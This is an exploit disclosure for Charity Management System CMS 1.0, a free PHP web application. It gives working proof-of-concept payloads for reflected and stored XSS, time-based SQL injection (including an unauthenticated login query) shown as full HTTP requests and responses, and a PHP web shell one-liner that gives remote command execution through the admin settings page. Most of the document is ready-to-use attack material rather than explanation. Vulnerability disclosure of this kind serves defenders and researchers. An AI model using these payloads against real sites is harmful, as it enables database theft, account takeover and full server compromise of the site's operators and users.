Charity Management System CMS 1.0 Code Execution / XSS / SQL Injection

Charity Management System CMS version 1.0 suffers from code execution, cross site scripting, and remote SQL injection vulnerabilities.


MD5 | a020398e0e0353cb8a5a49bdbde88373

# Exploit Title: Charity Management System CMS 1.0 - Multiple Vulnerabilities
# Date: 18/08/2021
# Exploit Author: Davide 't0rt3ll1n0' Taraschi
# Vendor Homepage: https://www.sourcecodester.com/users/tips23
# Software Link: https://www.sourcecodester.com/php/14908/simple-charity-website-management-system-cms-php-free-source-code.htmlpolice-crime-record-management-system.html
# Version: 1.0
# Testeted on: Linux (Ubuntu 20.04) using LAMPP


## Unauthenticated reflected XSS
# Vulnerable code in '/search.php' at line 44/45:
<?php if($count_all <= 0): ?>
<h4 class="text-center">No Article with "<?php echo $_GET['search'] ?>" keyword found.</h4>
The content of the 'search' variable is printed on the page without being checked, leading to XSS
# PoC
Go to 'http://site.com/charity/' and in the search box input "<svg onload=alert(document.domain)>" without the double quotes, and a text box should appear


## Authenticated stored XSS
There is a stored XSS in '/charity/admin/maintenance/manage_topic.php' due to a failure to sanitize user input
# Poc
1) Login as admin
2) Go to '/maintenance/manage_topic.php'
3) In "description" insert "<svg onload=alert(document.domain)>" without the double quotes
4) Click the "save" below
5) An alert box should appear


## POST Authenticated SQL Injection
# Vulnerable code in '/charity/classes/Master.php' at line 67
$del = $this->conn->query("DELETE FROM `topics` where id = '{$id}'");
The $id variable is used without being checked, leading to SQLi
# PoC
Request:
POST /charity/classes/Master.php?f=delete_topic HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 4
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/charity/admin/?page=maintenance/topics
Cookie: PHPSESSID=de17186191c1cbdeb6e815ea8c21103f
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))foo)-- foo

Response after 5 seconds (the sleep has been executed)

HTTP/1.1 200 OK
Date: Wed, 18 Aug 2021 14:32:13 GMT
Server: Apache/2.4.48 (Unix) OpenSSL/1.1.1k PHP/7.4.22 mod_perl/2.0.11 Perl/v5.32.1
X-Powered-By: PHP/7.4.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

{"status":"success"}


## GET Authenticated SQL Injection
# Vulnerable code in '/charity/admin/maintenance/manage_topic.php' at line 2/3
if(isset($_GET['id']) && $_GET['id'] > 0){
$qry = $conn->query("SELECT * from `topics` where id = '{$_GET['id']}' ");
...
}
As usual the 'id' variable is passed to the prepared statement without being checked, leading to (another) SQLi
# PoC
Similar to the previous one (same payload)


## POST Unauthenticated SQL Injection
# Vulnerable code in '/charity/classes/Login.php' at line 21
$qry = $this->conn->query("SELECT * from users where username = '$username' and password = md5('$password') ");
The 'username' variable is passed without being sanificated, causing a SQLi
# PoC
Request:
POST /charity/classes/Login.php?f=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 84
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/charity/admin/login.php
Cookie: PHPSESSID=de17186191c1cbdeb6e815ea8c21103f
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

username=username' AND (SELECT * FROM (SELECT(SLEEP(5)))foo)-- foo&password=password

Response after 5 seconds (the sleep has been executed)

HTTP/1.1 200 OK
Date: Wed, 18 Aug 2021 14:48:18 GMT
Server: Apache/2.4.48 (Unix) OpenSSL/1.1.1k PHP/7.4.22 mod_perl/2.0.11 Perl/v5.32.1
X-Powered-By: PHP/7.4.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 164
Connection: close
Content-Type: text/html; charset=UTF-8

{"status":"incorrect","last_qry":"SELECT * from users where username = 'username' AND (SELECT * FROM (SELECT(SLEEP(5)))foo)-- foo' and password = md5('password') "}


## PHP Code Injection lead to Authenticated Remote Code Execution (RCE)
# Vulnerable code in /charity/classes/SystemSettings.php at line 37
$qry = $this->conn->query("UPDATE system_info set meta_value = '{$value}' where meta_field = '{$key}' ");
The 'value' variable will be included in the homepage of the site without being checked, leading to RCE.
# PoC
1) Go to /charity/admin/system_info.php and in the "Welcome content" click on "Code View" at the top right.
2) At the bottom of the html code enter the following code: <?php if(isset($_GET['cmd'])) {system($_GET['cmd']);} ?>
3) Click the "update" button
4) Go to the home page and at the end of the url tipe "?cmd=$cmd" without the double quotes and replacing $cmd with the command you want to execute
5) The output should appear in the homepage

Related Posts